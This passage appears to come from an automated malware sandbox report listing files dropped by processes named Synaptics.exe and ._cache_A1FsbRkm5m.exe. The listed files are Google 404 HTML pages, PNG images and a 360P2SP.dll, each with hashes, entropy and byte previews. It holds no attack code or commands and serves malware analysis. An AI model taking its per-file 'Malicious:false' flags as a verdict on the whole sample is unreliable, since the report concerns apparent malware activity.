                                                                                                                                                                                        SHA1:2B4A0842DCFE644272D466BBC96D7A541DFDE4E7
                                                                                                                                                                                        SHA-256:B2859ACAD50BC9B175A22955ACCAD6FCD01DB7DE0F5FE4FB8E0F0288FDE1E62A
                                                                                                                                                                                        SHA-512:452AAC84A1A21A0F32B71196B891D3CAD9529A5AE2A33425DB5829B2FC3DCBD8907A43BDE06AE601A78D4CE066287D258596263BFD6B87CCBE4C975419437ABE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tGbIENm0W1Q1mF/ssXZXgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vtbJaoN.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.253680690362639
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+03yaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+cya+pAZewRDK4mW
                                                                                                                                                                                        MD5:E2E3FE6E9CC1E9DCFD53490A8A9F2849
                                                                                                                                                                                        SHA1:1A16FD128E33F5255E508CF2ED39438D524A044D
                                                                                                                                                                                        SHA-256:057B2E4E96887DF1A5312A8F2F5A6F1EFD3AAAED4772A8183BA0E947B7591C90
                                                                                                                                                                                        SHA-512:A196E6D06BB0785FFC2E48A46598DD412B590B32C1F3B41ADB1FD2BA9F3AF30080D03E5B98F48501014EB75EFE56402B350FEB4E71B8B62918DD7BD2EFF67776
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="blFPBi+c/2s2rugbzbJTHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\w5DyMAt.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265820165370406
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0B0+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++3+pAZewRDK4mW
                                                                                                                                                                                        MD5:AC7930CCDDFCACFF1D503B9D1C36BE1B
                                                                                                                                                                                        SHA1:8FF626787EABCF52AECF0E5F8C6BA150541BD7DC
                                                                                                                                                                                        SHA-256:F7C656E84985532DB5854ABBD316FACA788CA80D1BF5054D22714B6EBC837340
                                                                                                                                                                                        SHA-512:3ECB6370A8B3A74369114E4D198B59C462A37FFF1CDA97D8D118C1D3BE9235B1E05EE0B21EF8D09D36907150FE3C3FF4E70D61FA90742B45DC1E88D02E1A26D6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6LiiSmxsot+VW6vN5PPO1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\wDm8uLW.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268661296418803
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0yz5kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+pza+pAZewRDK4mW
                                                                                                                                                                                        MD5:92444A026ABF291BAAB136550AC2AD8E
                                                                                                                                                                                        SHA1:E9336F564A8AAB8C2EFFF97594CB6C8B68329354
                                                                                                                                                                                        SHA-256:DEF25A600069C234D818FEC65AE3BF7C09CEAFAD6A83C921D94D4584D2AF07E4
                                                                                                                                                                                        SHA-512:1BF797F8F59CA49BBDB0952974DEC3B6A995F32EA664C93D924D4141D602AAC940811480BD29849B3E3D0BF79E57226144D56B303C295FA445F743AEE7263DEF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WBtNeKz6DsHhKThwGXiANw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\wwmDNM7.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.276004884150037
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0abSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+fb+pAZewRDK4mW
                                                                                                                                                                                        MD5:4BA329611794489880A3E7528C55F2C5
                                                                                                                                                                                        SHA1:6DB250C038165FF74FA5AD2E58AF9FB14828DC76
                                                                                                                                                                                        SHA-256:86536B833B2D931E15F32036C81EE1AE5BB98F258D437C28DE399A4A2D8E8786
                                                                                                                                                                                        SHA-512:9E9054A0C861D1AD6AD8F5EE26B30E706F96A954903DB93B953B4AA5785733FB2BA289012A83154A4AF1D4640CE031E66E54E4F5601467BE336AE7C7A0D30A8B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+0OM9X8SS7JY4g/KrgZ7AQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\x6ANMtg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266581714211774
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+T+pAZewRDK4mW
                                                                                                                                                                                        MD5:B60F2712DE0BF66C1B3F9DADBA1D8485
                                                                                                                                                                                        SHA1:C6CF377DFF08B706B79CB2AAFC306F1A34FE9631
                                                                                                                                                                                        SHA-256:F6BFC1B951B543FE6700BB24DC293B64879C30C019A0358A4C41857E788162CF
                                                                                                                                                                                        SHA-512:FDD393EA058686FEDFB77B8205F9FB7E7029A7611449AF693890AFE7EFA9CF369C53441AFD91CB8869A20B920DCEB01BE0989BCD1129D2A158C0A58862908313
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EnxNHU14Ff7zTLj+2/HoMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xlhp3Ei.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260196176572294
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GuSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Q+pAZewRDK4mW
                                                                                                                                                                                        MD5:77F817B3AC48437FD3C983CC1AA68F8E
                                                                                                                                                                                        SHA1:E222B929615E63520F9EBDB9593756F905424650
                                                                                                                                                                                        SHA-256:2E7E6DF5925F9702F9856AB567D070AAC7F6577779F8816E4D718B252276B366
                                                                                                                                                                                        SHA-512:16D9ECDD1C29A3690714A461F463C384D4C18BCF67D50AEA33884A9DDA16EB63CAA0E3DE10E1E997DA3D3278DAD4570A37174DFF2A35326785C1584E6DA96B70
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qzyehGuMzJc2/ObzK0fhqQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xsmAYuE.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261588497576602
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0LhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S+pAZewRDK4mW
                                                                                                                                                                                        MD5:ADBE238E5BCC2F65741D5AB171E9260D
                                                                                                                                                                                        SHA1:5DA0FFF093229BF555F798CA39D1448BCA47A2F1
                                                                                                                                                                                        SHA-256:EF9BCAF9B663CC144337878CE7A765F844651F14F6009E651DB7862043234E4A
                                                                                                                                                                                        SHA-512:D91F8BD19E6C76CBB28DFBD2F831A9F1112944F709D6543C0061DF52CC6AE90879173B522F999A62E9B7C3CFA9219A2FA33F3967F223D427F02FCED9CFB79BB6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LNIWGR9uhrsIBNRhhPF/gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\yNR2laT.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25024868640076
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0EqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Bq+pAZewRDK4mW
                                                                                                                                                                                        MD5:6A551B0CE32D58156E6CB28DBDC0FD9A
                                                                                                                                                                                        SHA1:37B1222ED57FC80E6D97B18C4D265C5AFB109767
                                                                                                                                                                                        SHA-256:E58E10EB95177C86F9FECCA66E5AA66C388AEBD127846D38D7ED2A4AF5D8A3C9
                                                                                                                                                                                        SHA-512:0A6E6F23B5431E5EE10514A05DAAAA0303E26EC14D10026D7CB4D1D76A2D2BAD442751CFE5253623451281A85D4CA9823B48BC1D9970F69A6C980FBED23E6675
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mixFoxEwG0bYkut1uIXEDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\yZpBXnL.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269001732562967
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0npSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+q+pAZewRDK4mW
                                                                                                                                                                                        MD5:65745075661D4903A3469A0A0744BFC2
                                                                                                                                                                                        SHA1:260808A5B0634A5988F84A2EB19AE33DE80AB4A5
                                                                                                                                                                                        SHA-256:568CE04F543757BE5F63BAE4DF9F2D8BA2B83B1B5CF3EE7D6C1B768C4880DB9F
                                                                                                                                                                                        SHA-512:04047123176D011234009DB6B3943A9BC070AA0E3A03CE40817FA23F75732B345DE370FAC0B85727E028C121A18A6898C5FC8CC7808EF39004EB78B479A20152
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jLPqhlQ2Ka4JBEUAykTceQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{015C9CAB-6DBA-41fc-A3C2-F3AA63E08B53}.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1556
                                                                                                                                                                                        Entropy (8bit):7.507131051649285
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                                        MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                                        SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                                        SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                                        SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR..............g-....pHYs...........~.... cHRM..z%..............u0...`..:....o._.F....PLTE.................................................................................................................................................................................;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................B.F.....IDATx...[s.D....-.d.%...L...r*.8.....9.pC...d.g.HQf<..7.o....ju.Z.V.n9.[...u......w9wo.[./....U^....9or

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{13133FC1-53AC-4d76-9495-26C72C627A86}.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):16151
                                                                                                                                                                                        Entropy (8bit):7.9414528437087935
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                                        MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                                        SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                                        SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                                        SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR...X...|.....$m5S...GPLTE..q..q..r....v..#.....(.~+.1...w>...q..q.....r$.v".u..t..t..s..w(.w..q........}*.y..{..'.y-.y#.y1.z.....w..y6.|..{......t....x .".|'...~-.},.:.!.".%.$.(..9.}=.}%.|*./.{J.C.A.?.|+.D.0.2.2.~)...,.0.~?.?...~I.).1.x".'.|G.5.8.{N.Q.G.J.R.Q.Z.5.:.Y.Y.U..X1...M..Hc.i..\H.q..Tv.h...a....tRNS..f..f.f........hE..=pIDATx..m..`.....0..@.)q3.P.A...XDH.Q79_...B..=_;....o.i.r....q].u.....I..........w4.._..wv...E.Vs....x..v.O...>.Z......kw^...O.`..Hb........_. h.t_t:mM.b. 8@...%.)^...i.C....<...:.:a..~....... ..|....Y.l5....`&...-'..-.......&".#....ZB,..VL..../.B,.V.V.W|.Za......CZ.X\.....aT...x".w.}#.bu$.,K.....U.Y..j..U.AQ....W...{u~.....T..agf..:^f./O,.3.g..J"k^.Y....W..z'..T8<.b..ZA*.............*.....f....,*.n`Y.ld.b.K.KDV..b..S.%..F.h.O.WAEd).....#..5`^.D..Y........2&....S..S..Ax.W'....f.....+....]..}.ZQ.d..3...m.3...}.~......C..v.Y.b.........X,...l.1.)N.Y....[.....b=...=.

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{5E55AF9C-DBB2-486f-91C7-C9168C19150A}.tmp\360P2SP.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):704608
                                                                                                                                                                                        Entropy (8bit):6.625840358726942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                                        MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                                        SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                                        SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                                        SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: instbeta.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...nl..nl..nl..I..ol...s..fl..p>'.kl...#5.kl..g.6.Ol..g.*.el..I..ql..nl...m..g. ..l..g.'..l..g.1.ol..p>7.ol..nl4.ll..g.2.ol..Richnl..................PE..L......Z...........!......................................................................@..............................................................5......LS...................................................................................text............................... ..`.rdata..w...........................@..@.data...`........4..................@....rsrc...............................@..@.reloc..`p.......r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{89EF94DE-BCBD-48c8-9D05-DD67B97A97CF}.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14344
                                                                                                                                                                                        Entropy (8bit):7.934027356242661
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                                        MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                                        SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                                        SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                                        SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR...\...|.....-..)...>PLTE..q..q..s....v....x..!.1.+.+.%...|..q..r!.u$.v..t..s..t..r&.v..w+.x....z..'.x..}../.y......w..z5.{..t*.{..9.}..(.~..}#.|..".#.%.*.....~>.). ...|&.1.}....{+.!.y0.B.~F.*.=..B.6.zG.6.3.C.}:.2.~R.-.'.|B..L.K.O.=.|#.yF.".R..N.X.I.._./.xZ.,.wI..1.T.5.?...X..M..H=.w.bY.j..V*u.7....tRNS..e..e.e......2....6kIDATx...k..@..`...~.P.(j.b.%...W..EX.A.,........{.7.I3Y5......D}...i...8..`..~...W.En^8.jr..+....k... w.9.s....r....\.{-./].r.Q9...9.X.O&O..~........z]&...D.T..<|..e)/^.....X..p....|..Jd!.....7o..,...WX.....rV.../...Wo.{...K.2.U.G....4H.......y9d..q!=..i\.t5....",.r.....G.r....&.*...lI.<....z\N.<L./.k*.....B...k.U\./.t......../.7...U.+(]#.@R...V.q.g.&I.i.-d...v..-.2..a.W..LY.jl.,.B_..i..y..B....Y....K....+,]...,,..6......?..l..:#.xg.-..[o...m.WH+......E\.e|....K./...Z1]J.f.vq.Z.......u...+........[O..._..-^..E^r0.{.l.+O.FK........^...3..|]z\u.......b...VW..R.n..@...*w.q

